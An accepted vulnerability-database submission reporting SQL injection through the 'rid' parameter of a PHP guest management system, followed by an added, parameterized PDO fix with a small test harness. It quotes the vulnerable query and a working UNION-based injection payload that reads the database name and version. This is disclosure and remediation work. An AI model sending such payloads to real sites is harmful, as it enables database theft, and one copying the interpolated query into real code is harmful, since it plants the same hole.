Submission #43762: There is a SQL injection vulnerability in the guest management system.

Title: There is a SQL injection vulnerability in the guest management system.
Description: There is a SQL injection vulnerability in the visitor management system, which does not check the query content entered by the user. The input content is controllable by the user, and the user can construct a malicious payload to attack the website.

Vulnerability file location: /guestmanagement/front.php

Look at this source code:

```
// rid is read from the query string and interpolated into the SQL text as-is
if(isset($_GET['rid'])){
    $showResultFor = $_GET['rid'];
}
$query = "SELECT * FROM info_visitor WHERE ReceiptID = '$showResultFor' AND Status = 'ONLINE' ";
```

There is no protection for $rid here. Malicious data can be constructed here to attack the website database. The construction statement is as follows:

```
?rid=0' union select 1,database(),3,@@version,5,6,7,8,9,10,11,12,13,14,15,16--+
```

https://s1.ax1x.com/2022/08/13/vtDZfe.png

Source link: https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html
Source: ⚠️ https://www.sourcecodester.com/php/14664/guest-management-system-php-full-source-code.html/
User: qidian (UID 30810)
Submitted: 2022-08-16 01:03 AM (4 years ago)
Moderation: 2022-08-16 03:56 PM (15 hours later)
Status: Accepted
VulDB entry: 206489 [SourceCodester Guest Management System front.php rid SQL injection]
Points: 20
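
A parameterized version of the lookup in front.php, as an added example that is not part of the submission or of the project's own code. It assumes PDO is available and uses an in-memory SQLite table in place of the application's database; `find_online_visitor()`, the table columns other than `ReceiptID` and `Status`, and the sample rows are constructed for illustration.

```php
<?php
// Added example: hardened form of the front.php query.
// Assumptions: PDO with the SQLite driver; find_online_visitor() is a
// hypothetical helper; the table contents below are constructed sample data.

function find_online_visitor(PDO $db, $rid): array
{
    // $_GET values can be arrays (?rid[]=x); accept plain strings only.
    if (!is_string($rid) || $rid === '') {
        return [];
    }
    // The placeholder keeps $rid out of the SQL text, so quotes, UNION and
    // comment markers in the value are compared as data and never parsed.
    $stmt = $db->prepare(
        "SELECT * FROM info_visitor WHERE ReceiptID = :rid AND Status = 'ONLINE'"
    );
    $stmt->execute([':rid' => $rid]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed stand-in for the application's database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE info_visitor (ReceiptID TEXT, Status TEXT, Name TEXT)");
$db->exec("INSERT INTO info_visitor VALUES ('R1001', 'ONLINE', 'Sample Visitor')");
$db->exec("INSERT INTO info_visitor VALUES ('R1002', 'OFFLINE', 'Other Visitor')");

// In front.php the value would come from $_GET['rid']; here it is passed directly.
$inputs = [
    'R1001',   // legitimate receipt ID, ONLINE
    'R1002',   // exists, but not ONLINE
    ['R1001'], // array-valued parameter, rejected by the type check
    // Decoded rid value quoted in the submission; bound as a literal string.
    "0' union select 1,database(),3,@@version,5,6,7,8,9,10,11,12,13,14,15,16-- ",
];

foreach ($inputs as $rid) {
    $rows  = find_online_visitor($db, $rid);
    $label = is_string($rid) ? substr($rid, 0, 20) : gettype($rid);
    printf("%-20s => %d row(s)\n", $label, count($rows));
}
```

Only the first input returns a row; the value from the submission matches no `ReceiptID` because the whole string is compared as a single literal.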
